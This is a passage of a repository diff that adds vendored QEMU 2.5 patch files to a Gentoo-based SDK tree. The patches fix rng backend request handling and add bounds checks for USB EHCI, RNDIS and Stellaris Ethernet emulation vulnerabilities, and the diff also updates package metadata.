@@ -213,7 +202,6 @@ static void rng_egd_class_init(ObjectClass *klass, void *data)
RngBackendClass *rbc = RNG_BACKEND_CLASS(klass);
rbc->request_entropy = rng_egd_request_entropy;
- rbc->cancel_requests = rng_egd_cancel_requests;
rbc->opened = rng_egd_opened;
}
diff --git a/backends/rng.c b/backends/rng.c
index b7820ef..2f2f3ee 100644
--- a/backends/rng.c
+++ b/backends/rng.c
@@ -26,15 +26,6 @@ void rng_backend_request_entropy(RngBackend *s, size_t size,
}
}
-void rng_backend_cancel_requests(RngBackend *s)
-{
- RngBackendClass *k = RNG_BACKEND_GET_CLASS(s);
-
- if (k->cancel_requests) {
- k->cancel_requests(s);
- }
-}
-
static bool rng_backend_prop_get_opened(Object *obj, Error **errp)
{
RngBackend *s = RNG_BACKEND(obj);
diff --git a/include/sysemu/rng.h b/include/sysemu/rng.h
index 858be8c..87b3ebe 100644
--- a/include/sysemu/rng.h
+++ b/include/sysemu/rng.h
@@ -37,7 +37,6 @@ struct RngBackendClass
void (*request_entropy)(RngBackend *s, size_t size,
EntropyReceiveFunc *receive_entropy, void *opaque);
- void (*cancel_requests)(RngBackend *s);
void (*opened)(RngBackend *s, Error **errp);
};
@@ -68,14 +67,4 @@ struct RngBackend
void rng_backend_request_entropy(RngBackend *s, size_t size,
EntropyReceiveFunc *receive_entropy,
void *opaque);
-
-/**
- * rng_backend_cancel_requests:
- * @s: the backend to cancel all pending requests in
- *
- * Cancels all pending requests submitted by @rng_backend_request_entropy. This
- * should be used by a device during reset or in preparation for live migration
- * to stop tracking any request.
- */
-void rng_backend_cancel_requests(RngBackend *s);
#endif
--
2.7.4

135
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-rng-stack-corrupt-1.patch vendored Normal file
View File

@ -0,0 +1,135 @@
From 74074e8a7c60592cf1cc6469dbc2550d24aeded3 Mon Sep 17 00:00:00 2001
From: Ladi Prosek <lprosek@redhat.com>
Date: Thu, 3 Mar 2016 09:37:16 +0100
Subject: [PATCH] rng: move request queue from RngEgd to RngBackend
The 'requests' field now lives in the RngBackend parent class.
There are no functional changes in this commit.
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Message-Id: <1456994238-9585-3-git-send-email-lprosek@redhat.com>
Signed-off-by: Amit Shah <amit.shah@redhat.com>
---
backends/rng-egd.c | 28 +++++++++-------------------
include/sysemu/rng.h | 11 +++++++++++
2 files changed, 20 insertions(+), 19 deletions(-)
diff --git a/backends/rng-egd.c b/backends/rng-egd.c
index 0b2976a..b061362 100644
--- a/backends/rng-egd.c
+++ b/backends/rng-egd.c
@@ -25,19 +25,8 @@ typedef struct RngEgd
CharDriverState *chr;
char *chr_name;
-
- GSList *requests;
} RngEgd;
-typedef struct RngRequest
-{
- EntropyReceiveFunc *receive_entropy;
- uint8_t *data;
- void *opaque;
- size_t offset;
- size_t size;
-} RngRequest;
-
static void rng_egd_request_entropy(RngBackend *b, size_t size,
EntropyReceiveFunc *receive_entropy,
void *opaque)
@@ -66,7 +55,7 @@ static void rng_egd_request_entropy(RngBackend *b, size_t size,
size -= len;
}
- s->requests = g_slist_append(s->requests, req);
+ s->parent.requests = g_slist_append(s->parent.requests, req);
}
static void rng_egd_free_request(RngRequest *req)
@@ -81,7 +70,7 @@ static int rng_egd_chr_can_read(void *opaque)
GSList *i;
int size = 0;
- for (i = s->requests; i; i = i->next) {
+ for (i = s->parent.requests; i; i = i->next) {
RngRequest *req = i->data;
size += req->size - req->offset;
}
@@ -94,8 +83,8 @@ static void rng_egd_chr_read(void *opaque, const uint8_t *buf, int size)
RngEgd *s = RNG_EGD(opaque);
size_t buf_offset = 0;
- while (size > 0 && s->requests) {
- RngRequest *req = s->requests->data;
+ while (size > 0 && s->parent.requests) {
+ RngRequest *req = s->parent.requests->data;
int len = MIN(size, req->size - req->offset);
memcpy(req->data + req->offset, buf + buf_offset, len);
@@ -104,7 +93,8 @@ static void rng_egd_chr_read(void *opaque, const uint8_t *buf, int size)
size -= len;
if (req->offset == req->size) {
- s->requests = g_slist_remove_link(s->requests, s->requests);
+ s->parent.requests = g_slist_remove_link(s->parent.requests,
+ s->parent.requests);
req->receive_entropy(req->opaque, req->data, req->size);
@@ -117,12 +107,12 @@ static void rng_egd_free_requests(RngEgd *s)
{
GSList *i;
- for (i = s->requests; i; i = i->next) {
+ for (i = s->parent.requests; i; i = i->next) {
rng_egd_free_request(i->data);
}
- g_slist_free(s->requests);
- s->requests = NULL;
+ g_slist_free(s->parent.requests);
+ s->parent.requests = NULL;
}
static void rng_egd_opened(RngBackend *b, Error **errp)
diff --git a/include/sysemu/rng.h b/include/sysemu/rng.h
index 87b3ebe..c744d82 100644
--- a/include/sysemu/rng.h
+++ b/include/sysemu/rng.h
@@ -24,6 +24,7 @@
#define RNG_BACKEND_CLASS(klass) \
OBJECT_CLASS_CHECK(RngBackendClass, (klass), TYPE_RNG_BACKEND)
+typedef struct RngRequest RngRequest;
typedef struct RngBackendClass RngBackendClass;
typedef struct RngBackend RngBackend;
@@ -31,6 +32,15 @@ typedef void (EntropyReceiveFunc)(void *opaque,
const void *data,
size_t size);
+struct RngRequest
+{
+ EntropyReceiveFunc *receive_entropy;
+ uint8_t *data;
+ void *opaque;
+ size_t offset;
+ size_t size;
+};
+
struct RngBackendClass
{
ObjectClass parent_class;
@@ -47,6 +57,7 @@ struct RngBackend
/*< protected >*/
bool opened;
+ GSList *requests;
};
/**
--
2.7.4

155
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-rng-stack-corrupt-2.patch vendored Normal file
View File

@ -0,0 +1,155 @@
From 9f14b0add1dcdbfa2ee61051d068211fb0a1fcc9 Mon Sep 17 00:00:00 2001
From: Ladi Prosek <lprosek@redhat.com>
Date: Thu, 3 Mar 2016 09:37:17 +0100
Subject: [PATCH] rng: move request queue cleanup from RngEgd to RngBackend
RngBackend is now in charge of cleaning up the linked list on
instance finalization. It also exposes a function to finalize
individual RngRequest instances, called by its child classes.
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Message-Id: <1456994238-9585-4-git-send-email-lprosek@redhat.com>
Signed-off-by: Amit Shah <amit.shah@redhat.com>
---
backends/rng-egd.c | 25 +------------------------
backends/rng.c | 32 ++++++++++++++++++++++++++++++++
include/sysemu/rng.h | 12 ++++++++++++
3 files changed, 45 insertions(+), 24 deletions(-)
diff --git a/backends/rng-egd.c b/backends/rng-egd.c
index b061362..8f2bd16 100644
--- a/backends/rng-egd.c
+++ b/backends/rng-egd.c
@@ -58,12 +58,6 @@ static void rng_egd_request_entropy(RngBackend *b, size_t size,
s->parent.requests = g_slist_append(s->parent.requests, req);
}
-static void rng_egd_free_request(RngRequest *req)
-{
- g_free(req->data);
- g_free(req);
-}
-
static int rng_egd_chr_can_read(void *opaque)
{
RngEgd *s = RNG_EGD(opaque);
@@ -93,28 +87,13 @@ static void rng_egd_chr_read(void *opaque, const uint8_t *buf, int size)
size -= len;
if (req->offset == req->size) {
- s->parent.requests = g_slist_remove_link(s->parent.requests,
- s->parent.requests);
-
req->receive_entropy(req->opaque, req->data, req->size);
- rng_egd_free_request(req);
+ rng_backend_finalize_request(&s->parent, req);
}
}
}
-static void rng_egd_free_requests(RngEgd *s)
-{
- GSList *i;
-
- for (i = s->parent.requests; i; i = i->next) {
- rng_egd_free_request(i->data);
- }
-
- g_slist_free(s->parent.requests);
- s->parent.requests = NULL;
-}
-
static void rng_egd_opened(RngBackend *b, Error **errp)
{
RngEgd *s = RNG_EGD(b);
@@ -183,8 +162,6 @@ static void rng_egd_finalize(Object *obj)
}
g_free(s->chr_name);
-
- rng_egd_free_requests(s);
}
static void rng_egd_class_init(ObjectClass *klass, void *data)
diff --git a/backends/rng.c b/backends/rng.c
index 2f2f3ee..014cb9d 100644
--- a/backends/rng.c
+++ b/backends/rng.c
@@ -64,6 +64,30 @@ static void rng_backend_prop_set_opened(Object *obj, bool value, Error **errp)
s->opened = true;
}
+static void rng_backend_free_request(RngRequest *req)
+{
+ g_free(req->data);
+ g_free(req);
+}
+
+static void rng_backend_free_requests(RngBackend *s)
+{
+ GSList *i;
+
+ for (i = s->requests; i; i = i->next) {
+ rng_backend_free_request(i->data);
+ }
+
+ g_slist_free(s->requests);
+ s->requests = NULL;
+}
+
+void rng_backend_finalize_request(RngBackend *s, RngRequest *req)
+{
+ s->requests = g_slist_remove(s->requests, req);
+ rng_backend_free_request(req);
+}
+
static void rng_backend_init(Object *obj)
{
object_property_add_bool(obj, "opened",
@@ -72,6 +96,13 @@ static void rng_backend_init(Object *obj)
NULL);
}
+static void rng_backend_finalize(Object *obj)
+{
+ RngBackend *s = RNG_BACKEND(obj);
+
+ rng_backend_free_requests(s);
+}
+
static void rng_backend_class_init(ObjectClass *oc, void *data)
{
UserCreatableClass *ucc = USER_CREATABLE_CLASS(oc);
@@ -84,6 +115,7 @@ static const TypeInfo rng_backend_info = {
.parent = TYPE_OBJECT,
.instance_size = sizeof(RngBackend),
.instance_init = rng_backend_init,
+ .instance_finalize = rng_backend_finalize,
.class_size = sizeof(RngBackendClass),
.class_init = rng_backend_class_init,
.abstract = true,
diff --git a/include/sysemu/rng.h b/include/sysemu/rng.h
index c744d82..08a2eda 100644
--- a/include/sysemu/rng.h
+++ b/include/sysemu/rng.h
@@ -78,4 +79,15 @@ struct RngBackend
void rng_backend_request_entropy(RngBackend *s, size_t size,
EntropyReceiveFunc *receive_entropy,
void *opaque);
+
+/**
+ * rng_backend_free_request:
+ * @s: the backend that created the request
+ * @req: the request to finalize
+ *
+ * Used by child rng backend classes to finalize requests once they've been
+ * processed. The request is removed from the list of active requests and
+ * deleted.
+ */
+void rng_backend_finalize_request(RngBackend *s, RngRequest *req);
#endif
--
2.7.4

179
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-rng-stack-corrupt-3.patch vendored Normal file
View File

@ -0,0 +1,179 @@
From 60253ed1e6ec6d8e5ef2efe7bf755f475dce9956 Mon Sep 17 00:00:00 2001
From: Ladi Prosek <lprosek@redhat.com>
Date: Thu, 3 Mar 2016 09:37:18 +0100
Subject: [PATCH] rng: add request queue support to rng-random
Requests are now created in the RngBackend parent class and the
code path is shared by both rng-egd and rng-random.
This commit fixes the rng-random implementation which processed
only one request at a time and simply discarded all but the most
recent one. In the guest this manifested as delayed completion
of reads from virtio-rng, i.e. a read was completed only after
another read was issued.
By switching rng-random to use the same request queue as rng-egd,
the unsafe stack-based allocation of the entropy buffer is
eliminated and replaced with g_malloc.
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Message-Id: <1456994238-9585-5-git-send-email-lprosek@redhat.com>
Signed-off-by: Amit Shah <amit.shah@redhat.com>
---
backends/rng-egd.c | 16 ++--------------
backends/rng-random.c | 43 +++++++++++++++++++------------------------
backends/rng.c | 13 ++++++++++++-
include/sysemu/rng.h | 3 +--
4 files changed, 34 insertions(+), 41 deletions(-)
diff --git a/backends/rng-egd.c b/backends/rng-egd.c
index 8f2bd16..30332ed 100644
--- a/backends/rng-egd.c
+++ b/backends/rng-egd.c
@@ -27,20 +27,10 @@ typedef struct RngEgd
char *chr_name;
} RngEgd;
-static void rng_egd_request_entropy(RngBackend *b, size_t size,
- EntropyReceiveFunc *receive_entropy,
- void *opaque)
+static void rng_egd_request_entropy(RngBackend *b, RngRequest *req)
{
RngEgd *s = RNG_EGD(b);
- RngRequest *req;
-
- req = g_malloc(sizeof(*req));
-
- req->offset = 0;
- req->size = size;
- req->receive_entropy = receive_entropy;
- req->opaque = opaque;
- req->data = g_malloc(req->size);
+ size_t size = req->size;
while (size > 0) {
uint8_t header[2];
@@ -54,8 +44,6 @@ static void rng_egd_request_entropy(RngBackend *b, size_t size,
size -= len;
}
-
- s->parent.requests = g_slist_append(s->parent.requests, req);
}
static int rng_egd_chr_can_read(void *opaque)
diff --git a/backends/rng-random.c b/backends/rng-random.c
index 8cdad6a..a6cb385 100644
--- a/backends/rng-random.c
+++ b/backends/rng-random.c
@@ -22,10 +22,6 @@ struct RndRandom
int fd;
char *filename;
-
- EntropyReceiveFunc *receive_func;
- void *opaque;
- size_t size;
};
/**
@@ -38,36 +34,35 @@ struct RndRandom
static void entropy_available(void *opaque)
{
RndRandom *s = RNG_RANDOM(opaque);
- uint8_t buffer[s->size];
- ssize_t len;
- len = read(s->fd, buffer, s->size);
- if (len < 0 && errno == EAGAIN) {
- return;
- }
- g_assert(len != -1);
+ while (s->parent.requests != NULL) {
+ RngRequest *req = s->parent.requests->data;
+ ssize_t len;
+
+ len = read(s->fd, req->data, req->size);
+ if (len < 0 && errno == EAGAIN) {
+ return;
+ }
+ g_assert(len != -1);
- s->receive_func(s->opaque, buffer, len);
- s->receive_func = NULL;
+ req->receive_entropy(req->opaque, req->data, len);
+ rng_backend_finalize_request(&s->parent, req);
+ }
+
+ /* We've drained all requests, the fd handler can be reset. */
qemu_set_fd_handler(s->fd, NULL, NULL, NULL);
}
-static void rng_random_request_entropy(RngBackend *b, size_t size,
- EntropyReceiveFunc *receive_entropy,
- void *opaque)
+static void rng_random_request_entropy(RngBackend *b, RngRequest *req)
{
RndRandom *s = RNG_RANDOM(b);
- if (s->receive_func) {
- s->receive_func(s->opaque, NULL, 0);
+ if (s->parent.requests == NULL) {
+ /* If there are no pending requests yet, we need to
+ * install our fd handler. */
+ qemu_set_fd_handler(s->fd, entropy_available, NULL, s);
}
-
- s->receive_func = receive_entropy;
- s->opaque = opaque;
- s->size = size;
-
- qemu_set_fd_handler(s->fd, entropy_available, NULL, s);
}
static void rng_random_opened(RngBackend *b, Error **errp)
diff --git a/backends/rng.c b/backends/rng.c
index 014cb9d..277a41b 100644
--- a/backends/rng.c
+++ b/backends/rng.c
@@ -20,9 +20,20 @@ void rng_backend_request_entropy(RngBackend *s, size_t size,
void *opaque)
{
RngBackendClass *k = RNG_BACKEND_GET_CLASS(s);
+ RngRequest *req;
if (k->request_entropy) {
- k->request_entropy(s, size, receive_entropy, opaque);
+ req = g_malloc(sizeof(*req));
+
+ req->offset = 0;
+ req->size = size;
+ req->receive_entropy = receive_entropy;
+ req->opaque = opaque;
+ req->data = g_malloc(req->size);
+
+ k->request_entropy(s, req);
+
+ s->requests = g_slist_append(s->requests, req);
}
}
diff --git a/include/sysemu/rng.h b/include/sysemu/rng.h
index 08a2eda..4fffd68 100644
--- a/include/sysemu/rng.h
+++ b/include/sysemu/rng.h
@@ -45,8 +45,7 @@ struct RngBackendClass
{
ObjectClass parent_class;
- void (*request_entropy)(RngBackend *s, size_t size,
- EntropyReceiveFunc *receive_entropy, void *opaque);
+ void (*request_entropy)(RngBackend *s, RngRequest *req);
void (*opened)(RngBackend *s, Error **errp);
};
--
2.7.4

15
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-sysmacros.patch vendored Normal file
View File

@ -0,0 +1,15 @@
Linux C libs are moving away from implicit header pollution with sys/types.h
--- a/include/qemu/osdep.h
+++ b/include/qemu/osdep.h
@@ -78,6 +78,10 @@ extern int daemon(int, int);
#include <assert.h>
#include <signal.h>
+#ifdef __linux__
+#include <sys/sysmacros.h>
+#endif
+
#ifdef __OpenBSD__
#include <sys/signal.h>
#endif

52
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-usb-ehci-oob.patch vendored Normal file
View File

@ -0,0 +1,52 @@
From 49d925ce50383a286278143c05511d30ec41a36e Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Wed, 20 Jan 2016 01:26:46 +0530
Subject: [PATCH] usb: check page select value while processing iTD
While processing isochronous transfer descriptors(iTD), the page
select(PG) field value could lead to an OOB read access. Add
check to avoid it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1453233406-12165-1-git-send-email-ppandit@redhat.com
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index ab00268..93601d9 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -1405,21 +1405,23 @@ static int ehci_process_itd(EHCIState *ehci,
if (itd->transact[i] & ITD_XACT_ACTIVE) {
pg = get_field(itd->transact[i], ITD_XACT_PGSEL);
off = itd->transact[i] & ITD_XACT_OFFSET_MASK;
- ptr1 = (itd->bufptr[pg] & ITD_BUFPTR_MASK);
- ptr2 = (itd->bufptr[pg+1] & ITD_BUFPTR_MASK);
len = get_field(itd->transact[i], ITD_XACT_LENGTH);
if (len > max * mult) {
len = max * mult;
}
-
- if (len > BUFF_SIZE) {
+ if (len > BUFF_SIZE || pg > 6) {
return -1;
}
+ ptr1 = (itd->bufptr[pg] & ITD_BUFPTR_MASK);
qemu_sglist_init(&ehci->isgl, ehci->device, 2, ehci->as);
if (off + len > 4096) {
/* transfer crosses page border */
+ if (pg == 6) {
+ return -1; /* avoid page pg + 1 */
+ }
+ ptr2 = (itd->bufptr[pg + 1] & ITD_BUFPTR_MASK);
uint32_t len2 = off + len - 4096;
uint32_t len1 = len - len2;
qemu_sglist_add(&ehci->isgl, ptr1 + off, len1);
--
2.7.4

59
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-usb-ndis-int-overflow.patch vendored Normal file
View File

@ -0,0 +1,59 @@
From fe3c546c5ff2a6210f9a4d8561cc64051ca8603e Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Wed, 17 Feb 2016 00:23:41 +0530
Subject: [PATCH] usb: check RNDIS buffer offsets & length
When processing remote NDIS control message packets,
the USB Net device emulator uses a fixed length(4096) data buffer.
The incoming informationBufferOffset & Length combination could
overflow and cross that range. Check control message buffer
offsets and length to avoid it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1455648821-17340-3-git-send-email-ppandit@redhat.com
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/dev-network.c | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/hw/usb/dev-network.c b/hw/usb/dev-network.c
index 5dc4538..c6abd38 100644
--- a/hw/usb/dev-network.c
+++ b/hw/usb/dev-network.c
@@ -916,8 +916,9 @@ static int rndis_query_response(USBNetState *s,
bufoffs = le32_to_cpu(buf->InformationBufferOffset) + 8;
buflen = le32_to_cpu(buf->InformationBufferLength);
- if (bufoffs + buflen > length)
+ if (buflen > length || bufoffs >= length || bufoffs + buflen > length) {
return USB_RET_STALL;
+ }
infobuflen = ndis_query(s, le32_to_cpu(buf->OID),
bufoffs + (uint8_t *) buf, buflen, infobuf,
@@ -962,8 +963,9 @@ static int rndis_set_response(USBNetState *s,
bufoffs = le32_to_cpu(buf->InformationBufferOffset) + 8;
buflen = le32_to_cpu(buf->InformationBufferLength);
- if (bufoffs + buflen > length)
+ if (buflen > length || bufoffs >= length || bufoffs + buflen > length) {
return USB_RET_STALL;
+ }
ret = ndis_set(s, le32_to_cpu(buf->OID),
bufoffs + (uint8_t *) buf, buflen);
@@ -1213,8 +1215,9 @@ static void usb_net_handle_dataout(USBNetState *s, USBPacket *p)
if (le32_to_cpu(msg->MessageType) == RNDIS_PACKET_MSG) {
uint32_t offs = 8 + le32_to_cpu(msg->DataOffset);
uint32_t size = le32_to_cpu(msg->DataLength);
- if (offs + size <= len)
+ if (offs < len && size < len && offs + size <= len) {
qemu_send_packet(qemu_get_queue(s->nic), s->out_buf + offs, size);
+ }
}
s->out_ptr -= len;
memmove(s->out_buf, &s->out_buf[len], s->out_ptr);
--
2.7.4

107
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.1-CVE-2015-8558.patch vendored Normal file
View File

@ -0,0 +1,107 @@
https://bugs.gentoo.org/580426
https://bugs.gentoo.org/568246
From a49923d2837d20510d645d3758f1ad87c32d0730 Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Mon, 18 Apr 2016 09:20:54 +0200
Subject: [PATCH] Revert "ehci: make idt processing more robust"
This reverts commit 156a2e4dbffa85997636a7a39ef12da6f1b40254.
Breaks FreeBSD.
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index d5c0e1c..43a8f7a 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -1397,7 +1397,7 @@ static int ehci_process_itd(EHCIState *ehci,
{
USBDevice *dev;
USBEndpoint *ep;
- uint32_t i, len, pid, dir, devaddr, endp, xfers = 0;
+ uint32_t i, len, pid, dir, devaddr, endp;
uint32_t pg, off, ptr1, ptr2, max, mult;
ehci->periodic_sched_active = PERIODIC_ACTIVE;
@@ -1489,10 +1489,9 @@ static int ehci_process_itd(EHCIState *ehci,
ehci_raise_irq(ehci, USBSTS_INT);
}
itd->transact[i] &= ~ITD_XACT_ACTIVE;
- xfers++;
}
}
- return xfers ? 0 : -1;
+ return 0;
}
--
2.7.4
From 1ae3f2f178087711f9591350abad133525ba93f2 Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Mon, 18 Apr 2016 09:11:38 +0200
Subject: [PATCH] ehci: apply limit to iTD/sidt descriptors
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Commit "156a2e4 ehci: make idt processing more robust" tries to avoid a
DoS by the guest (create a circular iTD queue and let qemu ehci
emulation run in circles forever). Unfortunately this has two problems:
First it misses the case of siTDs, and second it reportedly breaks
FreeBSD.
So lets go for a different approach: just count the number of iTDs and
siTDs we have seen per frame and apply a limit. That should really
catch all cases now.
Reported-by: 杜少博 <dushaobo@360.cn>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 6 +++++-
1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index 159f58d..d5c0e1c 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -2011,6 +2011,7 @@ static int ehci_state_writeback(EHCIQueue *q)
static void ehci_advance_state(EHCIState *ehci, int async)
{
EHCIQueue *q = NULL;
+ int itd_count = 0;
int again;
do {
@@ -2035,10 +2036,12 @@ static void ehci_advance_state(EHCIState *ehci, int async)
case EST_FETCHITD:
again = ehci_state_fetchitd(ehci, async);
+ itd_count++;
break;
case EST_FETCHSITD:
again = ehci_state_fetchsitd(ehci, async);
+ itd_count++;
break;
case EST_ADVANCEQUEUE:
@@ -2087,7 +2090,8 @@ static void ehci_advance_state(EHCIState *ehci, int async)
break;
}
- if (again < 0) {
+ if (again < 0 || itd_count > 16) {
+ /* TODO: notify guest (raise HSE irq?) */
fprintf(stderr, "processing error - resetting ehci HC\n");
ehci_reset(ehci);
again = 0;
--
2.7.4

16
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.1-CVE-2016-4020.patch vendored Normal file
View File

@ -0,0 +1,16 @@
https://lists.gnu.org/archive/html/qemu-devel/2016-04/msg01106.html
https://bugs.gentoo.org/580040
diff --git a/hw/i386/kvmvapic.c b/hw/i386/kvmvapic.c
index c69f374..ff1e31a 100644
--- a/hw/i386/kvmvapic.c
+++ b/hw/i386/kvmvapic.c
@@ -394,7 +394,7 @@ static void patch_instruction(VAPICROMState *s, X86CPU *cpu, target_ulong ip)
CPUX86State *env = &cpu->env;
VAPICHandlers *handlers;
uint8_t opcode[2];
- uint32_t imm32;
+ uint32_t imm32 = 0;
target_ulong current_pc = 0;
target_ulong current_cs_base = 0;
int current_flags = 0;

47
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.1-stellaris_enet-overflow.patch vendored Normal file
View File

@ -0,0 +1,47 @@
From 3a15cc0e1ee7168db0782133d2607a6bfa422d66 Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Fri, 8 Apr 2016 11:33:48 +0530
Subject: [PATCH] net: stellaris_enet: check packet length against receive
buffer
When receiving packets over Stellaris ethernet controller, it
uses receive buffer of size 2048 bytes. In case the controller
accepts large(MTU) packets, it could lead to memory corruption.
Add check to avoid it.
Reported-by: Oleksandr Bazhaniuk <oleksandr.bazhaniuk@intel.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1460095428-22698-1-git-send-email-ppandit@redhat.com
Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
---
hw/net/stellaris_enet.c | 12 +++++++++++-
1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/hw/net/stellaris_enet.c b/hw/net/stellaris_enet.c
index 84cf60b..6880894 100644
--- a/hw/net/stellaris_enet.c
+++ b/hw/net/stellaris_enet.c
@@ -236,8 +236,18 @@ static ssize_t stellaris_enet_receive(NetClientState *nc, const uint8_t *buf, si
n = s->next_packet + s->np;
if (n >= 31)
n -= 31;
- s->np++;
+ if (size >= sizeof(s->rx[n].data) - 6) {
+ /* If the packet won't fit into the
+ * emulated 2K RAM, this is reported
+ * as a FIFO overrun error.
+ */
+ s->ris |= SE_INT_FOV;
+ stellaris_enet_update(s);
+ return -1;
+ }
+
+ s->np++;
s->rx[n].len = size + 6;
p = s->rx[n].data;
*(p++) = (size + 6);
--
2.7.4

12
sdk_container/src/third_party/portage-stable/app-emulation/qemu/metadata.xml vendored
View File

@ -1,7 +1,10 @@
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd"> <!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata> <pkgmetadata>
<herd>qemu</herd> <maintainer type="project">
<email>qemu@gentoo.org</email>
<name>Gentoo QEMU Project</name>
</maintainer>
<use> <use>
<flag name="accessibility">Adds support for braille displays using brltty</flag> <flag name="accessibility">Adds support for braille displays using brltty</flag>
<flag name="aio">Enables support for Linux's Async IO</flag> <flag name="aio">Enables support for Linux's Async IO</flag>
@ -10,6 +13,9 @@
<flag name="fdt">Enables firmware device tree support</flag> <flag name="fdt">Enables firmware device tree support</flag>
<flag name="glusterfs">Enables GlusterFS cluster fileystem via <flag name="glusterfs">Enables GlusterFS cluster fileystem via
<pkg>sys-cluster/glusterfs</pkg></flag> <pkg>sys-cluster/glusterfs</pkg></flag>
<flag name="gnutls">Enable TLS support for the VNC console server.
For 1.4 and newer this also enables WebSocket support.
For 2.0 through 2.3 also enables disk quorum support.</flag>
<flag name="gtk2">Use gtk-2 instead of gtk-3</flag> <flag name="gtk2">Use gtk-2 instead of gtk-3</flag>
<flag name="iscsi">Enable direct iSCSI support via <flag name="iscsi">Enable direct iSCSI support via
<pkg>net-libs/libiscsi</pkg> instead of indirectly via the Linux <pkg>net-libs/libiscsi</pkg> instead of indirectly via the Linux
@ -32,9 +38,6 @@
<flag name="snappy">Enable support for snappy compression</flag> <flag name="snappy">Enable support for snappy compression</flag>
<flag name="systemtap">Enable SystemTAP/DTrace tracing</flag> <flag name="systemtap">Enable SystemTAP/DTrace tracing</flag>
<flag name="tci">Enable the TCG Interpreter which can speed up or slowdown workloads depending on the host and guest CPUs being emulated. In the future it will be a runtime option but for now its compile time.</flag> <flag name="tci">Enable the TCG Interpreter which can speed up or slowdown workloads depending on the host and guest CPUs being emulated. In the future it will be a runtime option but for now its compile time.</flag>
<flag name="tls">Enable TLS support for the VNC console server.
For 1.4 and newer this also enables WebSocket support.
For 2.0 through 2.3 also enables disk quorum support.</flag>
<flag name="jpeg">Enable jpeg image support for the VNC console server</flag> <flag name="jpeg">Enable jpeg image support for the VNC console server</flag>
<flag name="png">Enable png image support for the VNC console server</flag> <flag name="png">Enable png image support for the VNC console server</flag>
<flag name="usb">Enable USB passthrough via <pkg>dev-libs/libusb</pkg></flag> <flag name="usb">Enable USB passthrough via <pkg>dev-libs/libusb</pkg></flag>
@ -42,6 +45,7 @@
<flag name="uuid">Enable UUID support in the vdi block driver</flag> <flag name="uuid">Enable UUID support in the vdi block driver</flag>
<flag name="vde">Enable VDE-based networking</flag> <flag name="vde">Enable VDE-based networking</flag>
<flag name="vhost-net">Enable accelerated networking using vhost-net, see http://www.linux-kvm.org/page/VhostNet</flag> <flag name="vhost-net">Enable accelerated networking using vhost-net, see http://www.linux-kvm.org/page/VhostNet</flag>
<flag name="virgl">Enable experimental Virgil 3d (virtual software GPU)</flag>
<flag name="virtfs">Enable VirtFS via virtio-9p-pci / fsdev. See http://wiki.qemu.org/Documentation/9psetup</flag> <flag name="virtfs">Enable VirtFS via virtio-9p-pci / fsdev. See http://wiki.qemu.org/Documentation/9psetup</flag>
<flag name="vte">Enable terminal support (<pkg>x11-libs/vte</pkg>) in the GTK+ interface</flag> <flag name="vte">Enable terminal support (<pkg>x11-libs/vte</pkg>) in the GTK+ interface</flag>
<flag name="xattr">Add support for getting and setting POSIX extended attributes, through <flag name="xattr">Add support for getting and setting POSIX extended attributes, through

615
sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.3.0-r5.ebuild vendored
View File

